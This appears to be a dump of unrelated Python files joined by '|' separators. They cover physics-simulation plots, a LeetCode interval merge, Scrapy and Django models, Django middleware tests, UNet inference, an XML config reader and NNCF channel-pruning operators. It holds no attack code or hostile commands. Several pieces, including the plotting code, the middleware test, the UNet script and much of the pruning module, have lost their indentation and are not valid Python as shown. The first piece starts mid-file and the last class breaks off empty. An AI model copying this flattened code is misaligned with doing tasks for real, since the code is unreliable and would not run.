omy=omega_list[1,:]
omz=omega_list[2,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 1 point O'")
axs[0].plot(time_list,omx)
axs[0].set(ylabel='omega x')
axs[1].plot(time_list,omy)
axs[1].set(ylabel='omega y')
axs[2].plot(time_list,omz)
axs[2].set(ylabel='omega z')
axs[2].set(xlabel='time')
#%%
# --- Body-2 position trajectories (rows 3:6 of r_list). ---
xx2=r_list[3,:]
yy2=r_list[4,:]
zz2=r_list[5,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 2 point O'")
axs[0].plot(time_list,xx2)
axs[0].set(ylabel='x')
axs[1].plot(time_list,yy2)
axs[1].set(ylabel='y')
axs[2].plot(time_list,zz2)
axs[2].set(ylabel='z')
axs[2].set(xlabel='time')
#%%calculate omega
# Angular velocity of body 2 (Euler parameters in rows 4:8).
E_list=[]
for i in range(0,max(p_list.shape)):
E_list.append(build_E(p_list[4:8,i]))
omega_list=np.zeros([3,max(p_list.shape)])
for i in range(0,max(p_d_list.shape)):
omega=2*(np.dot(E_list[i], p_d_list[4:8,i]))
omega.shape=(3,1)
omega_list[:,i:i+1]=omega
omx=omega_list[0,:]
omy=omega_list[1,:]
omz=omega_list[2,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 2 point O'")
axs[0].plot(time_list,omx)
axs[0].set(ylabel='omega x')
axs[1].plot(time_list,omy)
axs[1].set(ylabel='omega y')
axs[2].plot(time_list,omz)
axs[2].set(ylabel='omega z')
axs[2].set(xlabel='time')
#%%
# Velocity-constraint violation (2-norm of nue) over time; index 0 padded with 0
# because nue_list has one fewer entry than time_list.
nue_array=np.zeros([len(time_list)-1,10])
violation_list=[0]
for i in range(0,len(nue_list)):
nue_array[i,:]=nue_list[i]
violation_list.append(np.linalg.norm(nue_array[i,:]))
plt.figure()
plt.plot(time_list,violation_list)
plt.ylabel('2-Norm of Velocity Violation')
plt.xlabel('Time')
|
# https://leetcode.com/problems/merge-intervals/
# Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
# Algorithm
# After sorting the intervals by start, an interval i2 overlaps the current
# interval i1 (where i1.start <= i2.start) if and only if
# * i2.start <= i1.end
# If this is the case the two intervals can be merged by this process:
# * make start equal to the min of the two interval starts.
# * make the end equal to the max of the two interval ends.
class Solution(object):
    def merge(self, intervals):
        """
        :type intervals: List[Interval]
        :rtype: List[Interval]
        """
        if not intervals:
            return []

        # Sweep the intervals in order of their start point.
        ordered = sorted(intervals, key=lambda iv: iv.start)

        merged = []
        active = ordered[0]
        for candidate in ordered[1:]:
            # Because of the sort, active.start <= candidate.start; they
            # overlap exactly when the candidate begins before active ends.
            if candidate.start <= active.end:
                active = Interval(min(active.start, candidate.start),
                                  max(active.end, candidate.end))
            else:
                merged.append(active)
                active = candidate
        merged.append(active)
        return merged
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
from scrapy.loader.processors import MapCompose
class ArticlespiderItem(scrapy.Item):
    """Placeholder item; no fields defined yet.

    Add fields here as the spider grows, e.g.::

        name = scrapy.Field()
    """
    pass
def add_prefix(value):
    """Append the 'YZK_SPIDER' marker to *value* (despite the name, it is a suffix)."""
    marker = 'YZK_SPIDER'
    return value + marker
class JobboleArticleItem(scrapy.Item):
    """Scraped Jobbole article with engagement counters."""
    # The title gets the YZK_SPIDER marker appended on input.
    title = scrapy.Field(input_processor=MapCompose(add_prefix))
    create_date = scrapy.Field()
    url = scrapy.Field()
    url_object_id = scrapy.Field()
    praise_num = scrapy.Field()
    favor_num = scrapy.Field()
    comment_num = scrapy.Field()
    tags = scrapy.Field()
|
from datetime import date, timedelta
from desio.model import users, fixture_helpers as fh
from desio.tests import *
# Functional tests for the app's WSGI middleware stack.
# NOTE(review): form_url/exception_url are resolved at class-definition time via
# url_for — presumably the test framework sets up routing before import; verify.
class TestMiddleware(TestController):
form_url = url_for(controller='test', action='rando_form')
exception_url = url_for(controller='test', action='exception')
# Non-admin users must not see the debug/timing panel; admins must.
def test_timer_proxy(self):
u = fh.create_user()
self.flush()
self.login(u)
response = self.post(self.form_url, {
'a_number': 32,
'a_string': 'aodij'
})
assert response.tmpl_context.show_debug == False
assert response.tmpl_context.queries == ''
# Same request as an admin: debug info and query timings are exposed.
u = fh.create_user(is_admin=True)
self.flush()
self.login(u)
response = self.post(self.form_url, {
'a_number': 32,
'a_string': 'aodij'
})
assert response.tmpl_context.show_debug == True
assert len(response.tmpl_context.queries) == 3
# NOTE(review): 'querie_time' looks like a typo for 'query_time' — confirm
# against the middleware that populates tmpl_context.
assert response.tmpl_context.querie_time > 0.0
for q, t in response.tmpl_context.queries:
assert q
assert t > 0.0
# Disabled test below kept verbatim (error-middleware behaviour, admin vs not).
"""
def test_error_middleware(self):
u = fh.create_user()
self.flush()
self.login(u)
response = self.client_async(self.exception_url, {
'type': 'app'
})
assert 'debug' not in response
u = fh.create_user(is_admin=True)
self.flush()
self.login(u)
response = self.client_async(self.exception_url, {
'type': 'app'
})
assert 'debug' in response
assert response.debug
assert response.debug.file
assert response.debug.line
assert response.debug.trace
assert response.debug.url
assert response.debug.message
"""
import numpy as np
from PIL import Image
import torch
import torch.nn as nn
from torch.autograd import Variable
# from import *
import torch.nn as nn
# from accuracy import accuracy_check, accuracy_check_for_batch
import scipy.io as sio
import os
from loss import *
from unet1 import *
import matplotlib.pyplot as plt
# --- UNet inference over .mat test files: pad, predict, crop, save. ---
START_FILTER = 32
IMG_CHANNELS = 1
IMG_HEIGHT= 512
IMG_WIDTH = 512
WEIGHTS_PATH = './weights/weights_train6_2-1000epochs.pth'
TEST_PATH = './Test_data/'
# SAVE_PATH derives a run name from the weights filename (e.g. 'train6').
SAVE_PATH = './Results/' + (WEIGHTS_PATH.split('_')[1].split('.')[0] + '_final')
# Each sample is assumed to come as a pair of files in TEST_PATH.
lst = os.listdir(TEST_PATH)
n_samples = len(lst)//2
if not os.path.exists(SAVE_PATH):
os.mkdir(SAVE_PATH)
print('\nFolder Created', SAVE_PATH)
else:
print('\nAlready exists', SAVE_PATH)
# Load Model
# Weights are loaded onto CPU first, then the model is wrapped for GPU execution.
device = torch.device('cpu')
model = UNet(START_FILTER)
model.load_state_dict(torch.load(WEIGHTS_PATH, map_location=device))
model = torch.nn.DataParallel(model, device_ids=list(
range(torch.cuda.device_count()))).cuda()
model.eval()
# NOTE(review): X_test/Y_test are allocated but never filled in this chunk.
X_test = np.zeros((n_samples, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype='float32')
Y_test = np.zeros((n_samples, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype='float32')
# Keys inside the .mat files: ground truth vs. degraded input.
full = 'original'
limited = 'limited_noise_interpolated'
files = os.listdir(TEST_PATH)
for file in files:
# Skip ground-truth files; only the degraded inputs are fed to the network.
if (file.startswith('original')):
continue
load_path = TEST_PATH + file
# Load image and add reflective padding
print(file)
mat = sio.loadmat(load_path)
test_img = np.asarray(mat[limited], dtype='float32')
# Reflect-pad the 200-row sinogram to the 512-row network input height.
test_img = np.pad(test_img, [(156,156),(0,0) ], mode = 'reflect')
# test_img = np.pad(test_img, [(156,156),(0,0) ], mode = 'constant', constant_values=0)
plt.imsave('in.png', test_img, cmap='Greys')
test_img = test_img.reshape(1, IMG_HEIGHT, IMG_WIDTH)
# print('test_img np: ',test_img)
test_img = torch.FloatTensor(test_img)
# print('test_tensor',test_img.shape)
print('\n')
with torch.no_grad():
# print('test image: ',test_img)
# Add a batch dimension and move to GPU for the forward pass.
model_out = Variable(test_img.unsqueeze(0).cuda())
# print('model_out: ',model_out)
model_output = model(model_out)
# print('model_out: ',model_output)
pred_out = np.asarray(model_output.cpu().detach().numpy(), dtype = 'float32').reshape(512, 512)
plt.imsave('pred.png', pred_out, cmap='Greys')
# Crop the padding back off before saving the prediction.
pred_out = pred_out[156:356, :]
save_name = file.split('.')[0] + '_pred.mat'
sio.savemat(SAVE_PATH + '/' + save_name, {"pred_pad": pred_out})
print('Saving mat file...', save_name)
|
#!/usr/bin/env python
# encoding: UTF-8
import os
import sys

from xml.etree import ElementTree as ET
class XmlHandler:
    """Thin wrapper around an ElementTree-backed XML config file.

    The expected document has flat child nodes named host, port, path,
    timestamp and offset. ``read`` returns their texts; ``write`` stores
    new timestamp/offset values and persists the tree back to disk.
    """

    def __init__(self, xmlfile):
        print("xmlHandler init: " + xmlfile)
        self.xmlTree = self.readXml(xmlfile)

    def readXml(self, in_path):
        """Parse *in_path* and return the ElementTree.

        Exits the process when the file does not exist. A parse failure is
        reported and re-raised: the original bare ``except`` swallowed the
        error and then crashed on the unbound ``tree`` variable, and it
        called ``sys.exit()`` without ``sys`` being imported.
        """
        if not os.path.exists(in_path):
            print("there is no such file: " + in_path)
            sys.exit()
        try:
            tree = ET.parse(in_path)
        except ET.ParseError:
            print("tree parse error")
            raise
        print("return tree successfully")
        return tree

    def getNodes(self, tree):
        """Return the direct children of the document root."""
        root = tree.getroot()
        print("return root successfully")
        # Element.getchildren() was removed in Python 3.9; list(root) is the
        # supported way to enumerate direct children.
        return list(root)

    def findNode(self, nodes, tag):
        """Return the first node with *tag*, or None when absent."""
        for node in nodes:
            if node.tag == tag:
                return node

    def getTexts(self, nodes, tags):
        """Return the text of each tag in *tags*, in order."""
        return [self.findNode(nodes, tag).text for tag in tags]

    def read(self):
        """Return (host, port, path, timestamp, offset) texts."""
        nodes = self.getNodes(self.xmlTree)
        host, port, path, timestamp, offset = self.getTexts(
            nodes, ["host", "port", "path", "timestamp", "offset"])
        return host, port, path, timestamp, offset

    def writeXml(self, node, text):
        """Set *node*'s text."""
        node.text = text

    def setTexts(self, texts, tags):
        """Assign each text in *texts* to the matching tag in *tags*."""
        nodes = self.getNodes(self.xmlTree)
        for text, tag in zip(texts, tags):
            self.writeXml(self.findNode(nodes, tag), text)

    def write(self, newTimestamp, newOffset, xmlfile):
        """Store the new timestamp/offset and persist the tree to *xmlfile*."""
        self.setTexts([newTimestamp, newOffset], ["timestamp", "offset"])
        self.xmlTree.write(xmlfile, encoding="utf-8")
if __name__ == '__main__':
    # Smoke test: load the config and print it before/after a (disabled) write.
    # Fixed: the old Python-2 `print x` statements were a SyntaxError under
    # Python 3, while the rest of the module already uses print() calls.
    xmlHandler = XmlHandler("client_config.xml")
    print(xmlHandler.read())
    #xmlHandler.write("newTimestamp", "newOffset", "client_config.xml")
    print(xmlHandler.read())
|
from django.db import models
from django.contrib.auth.models import User
# Model for creating homework assignments for users.
class Homework(models.Model):
    """A named homework assignment with a short description."""
    homework_name = models.CharField(max_length=100)
    description = models.CharField(max_length=300)

    def __str__(self):
        return self.homework_name
# Model linking a user, an assigned homework task, and the submitted answer file.
class PersonalHomework(models.Model):
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    homework_task = models.ForeignKey(Homework, on_delete=models.CASCADE)
    # Bug fix: models.FieldFile is the runtime value wrapper, not a model field
    # class — the field for uploaded files is models.FileField.
    homework_file = models.FileField()

    def __str__(self):
        data = (self.user.username, self.homework_task.homework_name)
        return ' | '.join(data)
# Model holding the grading outcome for every submitted homework.
class HomeworkResult(models.Model):
    """Grading record (mark, explanation, pass/fail) for one PersonalHomework."""
    HM = models.ForeignKey(PersonalHomework, on_delete=models.CASCADE)
    mark = models.IntegerField(default=0)
    explanation = models.CharField(max_length=100)
    condition = models.CharField(
        max_length=20,
        choices=[('done', 'Done'), ('fail', 'Fail')],
    )

    def __str__(self):
        submission = self.HM
        data = (submission.user.username, submission.homework_task.homework_name)
        return ' | '.join(data)
import numpy as np

# Draw 10 random integers in [10, 50) and report basic descriptive statistics
# in the same order as before: sample, std, mean, median.
samples = np.random.randint(10, 50, 10)
print(samples)
for statistic in (np.std, np.mean, np.median):
    print(statistic(samples))
|
"""
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
import torch
from nncf.common.pruning.export_helpers import DefaultMetaOp
from nncf.common.pruning.utils import is_grouped_conv
from nncf.common.pruning.utils import get_sources_of_node
from nncf.common.graph.module_attributes import GroupNormModuleAttributes
from nncf.dynamic_graph.graph import PTNNCFGraph
from nncf.dynamic_graph.graph import PTNNCFNode
from nncf.dynamic_graph.operator_metatypes import NoopMetatype, HardTanhMetatype, TanhMetatype, RELUMetatype, \
PRELUMetatype, ELUMetatype, GELUMetatype, SigmoidMetatype, SoftmaxMetatype, AvgPool2dMetatype, MaxPool2dMetatype, \
DropoutMetatype, Conv1dMetatype, Conv2dMetatype, Conv3dMetatype, BatchNormMetatype, CatMetatype, AddMetatype, \
SubMetatype, DivMetatype, MulMetatype, LinearMetatype, MatMulMetatype, MinMetatype, MaxMetatype, MeanMetatype, \
ConvTranspose2dMetatype, ConvTranspose3dMetatype, GroupNormMetatype
from nncf.common.utils.logger import logger as nncf_logger
from nncf.nncf_network import NNCFNetwork
from nncf.pruning.export_utils import PTPruningOperationsMetatypeRegistry
from nncf.pruning.export_utils import identity_mask_propagation, get_input_masks, \
fill_input_masks
from nncf.layers import NNCF_WRAPPED_USER_MODULES_DICT
from nncf.pruning.utils import is_depthwise_conv
# Registry mapping operator metatypes to the pruning meta-op classes below.
PT_PRUNING_OPERATOR_METATYPES = PTPruningOperationsMetatypeRegistry("operator_metatypes")
# pylint: disable=protected-access
# Base class for PyTorch pruning meta-ops: defines the mask-propagation /
# input-prune / output-prune protocol the registered subclasses implement.
class PTDefaultMetaOp(DefaultMetaOp):
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
"""
Propagate mask through a node using masks of all inputs and pruning mask of current node (if any).
Should set the following attributes:
input_masks - list of masks of input nodes (None if there is no mask in some input)
output_mask - resulting mask of nx_node operation
:param model: model to prune
:param nx_node: node from networkx graph to propagate mask through it
:param graph: graph of model to prune
:param nx_graph: networkx graph
"""
raise NotImplementedError
# The two hooks below intentionally default to no-ops; subclasses override
# them when the operation actually has prunable weights.
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
"""
Prune nx_node by input_masks (if masks is not none and operation support it).
"""
@classmethod
def output_prune(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
"""
Prune nx_node by output_mask (if mask is not none and operation support it).
"""
@PT_PRUNING_OPERATOR_METATYPES.register('model_input')
class PTInput(PTDefaultMetaOp):
    """Meta-op for model inputs: an input never carries a pruning mask."""
    subtypes = [NoopMetatype]

    @classmethod
    def accept_pruned_input(cls, node: PTNNCFNode):
        # Nothing upstream of a model input can prune its channels.
        return False

    @classmethod
    def mask_propagation(cls, model, nx_node, graph, nx_graph):
        # An input has no producers, hence no input masks and no output mask.
        nx_node.update(input_masks=[], output_mask=None)
@PT_PRUNING_OPERATOR_METATYPES.register('identity_mask_propagation')
class PTIdentityMaskForwardOps(PTDefaultMetaOp):
    """Elementwise/pooling ops that neither create nor block pruning masks:
    the input mask is forwarded unchanged."""
    subtypes = [
        HardTanhMetatype, TanhMetatype, RELUMetatype, PRELUMetatype,
        ELUMetatype, GELUMetatype, SigmoidMetatype, SoftmaxMetatype,
        AvgPool2dMetatype, MaxPool2dMetatype, DropoutMetatype,
    ]
    additional_types = ['h_sigmoid', 'h_swish', 'RELU']

    @classmethod
    def accept_pruned_input(cls, node: PTNNCFNode):
        return True

    @classmethod
    def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
        identity_mask_propagation(nx_node, nx_graph)
@PT_PRUNING_OPERATOR_METATYPES.register('convolution')
# Pruning meta-op for 1/2/3-D convolutions: propagates the layer's own filter
# mask, with special handling of grouped/depthwise convolutions.
class PTConvolution(PTDefaultMetaOp):
subtypes = [Conv1dMetatype, Conv2dMetatype, Conv3dMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
# Grouped convs cannot take a pruned input unless they are depthwise
# (groups == in_channels), where input and output channels prune together.
accept_pruned_input = True
if is_grouped_conv(node):
if not is_depthwise_conv(node):
accept_pruned_input = False
return accept_pruned_input
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
output_mask = None
is_depthwise = False
input_masks = get_input_masks(nx_node, nx_graph)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
# The conv's own pruning mask lives in its first pre-op (if installed).
if node_module.pre_ops:
output_mask = node_module.pre_ops['0'].op.binary_filter_pruning_mask
# In case of group convs we can't prune by output filters
if is_grouped_conv(nncf_node):
if is_depthwise_conv(nncf_node):
# Depthwise case
# Depthwise conv mirrors its input mask to its output.
is_depthwise = True
output_mask = input_masks[0]
else:
output_mask = None
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = output_mask
nx_node['is_depthwise'] = is_depthwise
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
# Remove the input channels that the upstream mask marked as pruned.
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
new_num_channels = int(torch.sum(input_mask))
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
is_depthwise = nx_node['is_depthwise']
old_num_clannels = int(node_module.weight.size(1))
if is_depthwise:
# In depthwise case prune output channels by input mask, here only fix for new number of input channels
node_module.groups = new_num_channels
node_module.in_channels = new_num_channels
old_num_clannels = int(node_module.weight.size(0))
else:
# Broadcast the channel mask over all output filters, then reshape the
# surviving weights back to (out, new_in, *kernel).
out_channels = node_module.weight.size(0)
broadcasted_mask = bool_mask.repeat(out_channels).view(out_channels, bool_mask.size(0))
new_weight_shape = list(node_module.weight.shape)
new_weight_shape[1] = new_num_channels
node_module.in_channels = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[broadcasted_mask].view(new_weight_shape))
nncf_logger.info('Pruned Convolution {} by input mask. Old input filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@classmethod
def output_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
# Remove pruned output filters (and matching bias entries) in place.
mask = nx_node['output_mask']
if mask is None:
return
bool_mask = torch.tensor(mask, dtype=torch.bool)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
old_num_clannels = int(node_module.weight.size(0))
node_module.out_channels = int(torch.sum(mask))
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
if node_module.bias is not None:
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
nncf_logger.info('Pruned Convolution {} by pruning mask. Old output filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, node_module.out_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('transpose_convolution')
# Pruning meta-op for transposed convolutions. Note the weight layout is
# (in_channels, out_channels, *kernel) — the transpose of a regular conv —
# so input/output pruning index the opposite weight dimensions.
class PTTransposeConvolution(PTDefaultMetaOp):
subtypes = [ConvTranspose2dMetatype, ConvTranspose3dMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
output_mask = None
accept_pruned_input = True
input_masks = get_input_masks(nx_node, nx_graph)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
# The layer's own filter mask lives in its first pre-op (if installed).
if node_module.pre_ops:
output_mask = node_module.pre_ops['0'].op.binary_filter_pruning_mask
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = output_mask
nx_node['accept_pruned_input'] = accept_pruned_input
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
# For transposed conv, input channels are weight dim 0: mask rows directly.
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
old_num_clannels = int(node_module.weight.size(0))
node_module.in_channels = int(torch.sum(bool_mask))
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
nncf_logger.info('Pruned ConvTranspose {} by input mask. Old input filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, node_module.in_channels))
@classmethod
def output_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
# Output channels are weight dim 1: broadcast the mask across dim 0 rows,
# select, and reshape to (in, new_out, *kernel).
output_mask = nx_node['output_mask']
if output_mask is None:
return
bool_mask = torch.tensor(output_mask, dtype=torch.bool)
new_num_channels = int(torch.sum(bool_mask))
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
old_num_clannels = int(node_module.weight.size(1))
in_channels = node_module.weight.size(0)
broadcasted_mask = bool_mask.repeat(in_channels).view(in_channels, bool_mask.size(0))
new_weight_shape = list(node_module.weight.shape)
new_weight_shape[1] = new_num_channels
node_module.out_channels = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[broadcasted_mask].view(new_weight_shape))
if node_module.bias is not None:
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
nncf_logger.info('Pruned ConvTranspose {} by pruning mask. Old output filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, node_module.out_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('batch_norm')
# Pruning meta-op for BatchNorm: forwards the mask unchanged and shrinks all
# per-channel buffers/parameters when the input is pruned.
class PTBatchNorm(PTDefaultMetaOp):
subtypes = [BatchNormMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
# BatchNorm is channel-wise: the input mask passes straight through.
identity_mask_propagation(nx_node, nx_graph)
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
old_num_clannels = int(node_module.weight.size(0))
new_num_channels = int(torch.sum(input_mask))
node_module.num_features = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
# Running statistics are shrunk too; wrapped as non-grad Parameters here
# (NOTE(review): plain buffers would be the usual representation — confirm
# downstream code relies on the Parameter wrapping).
node_module.running_mean = torch.nn.Parameter(node_module.running_mean[bool_mask], requires_grad=False)
node_module.running_var = torch.nn.Parameter(node_module.running_var[bool_mask], requires_grad=False)
nncf_logger.info('Pruned BatchNorm {} by input mask. Old num features: {}, new num features:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('group_norm')
# Pruning meta-op for GroupNorm; only the instance-norm configuration
# (num_groups == num_channels) can accept a pruned input.
class GroupNorm(PTDefaultMetaOp):
subtypes = [GroupNormMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
# For Instance Normalization
return isinstance(node.module_attributes, GroupNormModuleAttributes) \
and node.module_attributes.num_groups == node.module_attributes.num_channels
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
# Channel-wise op: forward the input mask unchanged.
identity_mask_propagation(nx_node, nx_graph)
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
old_num_clannels = int(node_module.weight.size(0))
new_num_channels = int(torch.sum(input_mask))
# Instance-norm invariant: keep num_groups == num_channels after pruning.
node_module.num_channels = new_num_channels
node_module.num_groups = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
nncf_logger.info('Pruned GroupNorm {} by input mask. Old num features: {}, new num features:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('concat')
# Pruning meta-op for torch.cat: the output mask is the concatenation of the
# (filled) input masks, provided every input ultimately comes from a conv.
class PTConcat(PTDefaultMetaOp):
subtypes = [CatMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def all_inputs_from_convs(cls, nx_node, nx_graph, graph):
"""
Return whether all input sources of nx_node is convolutions or not
:param nx_node: node to determine it's sources
:param nx_graph: networkx graph to work with
:param graph: NNCF graph to work with
"""
inputs = [u for u, _ in nx_graph.in_edges(nx_node['key'])]
input_masks = get_input_masks(nx_node, nx_graph)
for i, inp in enumerate(inputs):
# If input has mask -> it went from convolution (source of this node is a convolution)
if input_masks[i] is not None:
continue
# Mask-less input: trace back to its sources and reject if any of them
# is a mask-stopping op (e.g. a fully-connected layer).
nncf_input_node = graph._nx_node_to_nncf_node(nx_graph.nodes[inp])
source_nodes = get_sources_of_node(nncf_input_node, graph, PTConvolution.get_all_op_aliases() +
PTStopMaskForwardOps.get_all_op_aliases() +
PTInput.get_all_op_aliases())
sources_types = [node.op_exec_context.operator_name for node in source_nodes]
if any(t in sources_types for t in PTStopMaskForwardOps.get_all_op_aliases()):
return False
return True
@classmethod
def check_concat(cls, nx_node, nx_graph, graph):
# Thin wrapper kept for readability at the call site.
if cls.all_inputs_from_convs(nx_node, nx_graph, graph):
return True
return False
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
result_mask = None
if cls.check_concat(nx_node, nx_graph, graph):
# fill_input_masks substitutes all-ones masks for mask-less inputs so
# the concatenated mask has the full channel count.
input_masks, filled_input_masks = fill_input_masks(nx_node, nx_graph)
if all(mask is None for mask in input_masks):
result_mask = None
else:
result_mask = torch.cat(filled_input_masks)
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = result_mask
@PT_PRUNING_OPERATOR_METATYPES.register('elementwise')
# Pruning meta-op for elementwise binary ops: all inputs must share the same
# mask, which is then forwarded as the output mask.
class PTElementwise(PTDefaultMetaOp):
subtypes = [AddMetatype, SubMetatype, DivMetatype, MulMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_masks = get_input_masks(nx_node, nx_graph)
nx_node['input_masks'] = input_masks
# NOTE(review): masks are only cross-checked when the first one is not None;
# a None first mask with masked later inputs passes silently — confirm intended.
if input_masks[0] is not None:
assert all(torch.allclose(input_masks[0], mask) for mask in input_masks)
nx_node['output_mask'] = input_masks[0]
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
# Only user-wrapped modules with per-channel weights need actual pruning here.
if isinstance(node_module, tuple(NNCF_WRAPPED_USER_MODULES_DICT)):
assert node_module.target_weight_dim_for_compression == 0,\
"Implemented only for target_weight_dim_for_compression == 0"
old_num_clannels = int(node_module.weight.size(0))
new_num_channels = int(torch.sum(input_mask))
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
node_module.n_channels = new_num_channels
nncf_logger.info('Pruned Elementwise {} by input mask. Old num features: {}, new num features:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('stop_propagation_ops')
class PTStopMaskForwardOps(PTDefaultMetaOp):
    """Ops through which pruning masks must not travel (reductions, FC layers,
    matmuls): incoming masks are recorded, the outgoing mask is dropped."""
    subtypes = [MeanMetatype, MaxMetatype, MinMetatype, LinearMetatype, MatMulMetatype]

    @classmethod
    def accept_pruned_input(cls, node: PTNNCFNode):
        return False

    @classmethod
    def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
        # Keep the incoming masks for bookkeeping but terminate propagation here.
        nx_node['input_masks'] = get_input_masks(nx_node, nx_graph)
        nx_node['output_mask'] = None
class ModelPruner:
    """Drives pruning of an NNCF network: first propagates pruning masks
    through the graph, then applies them to the underlying modules."""

